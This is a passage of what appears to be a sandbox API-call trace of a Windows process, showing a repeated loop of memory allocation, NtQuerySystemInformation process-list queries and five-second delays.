0x0 [0118.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.456] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.472] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.490] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.501] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.517] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.535] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.550] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.566] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.581] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.595] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.611] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.635] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.641] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.658] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.673] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.690] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.706] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.722] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.737] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.773] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.783] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.799] 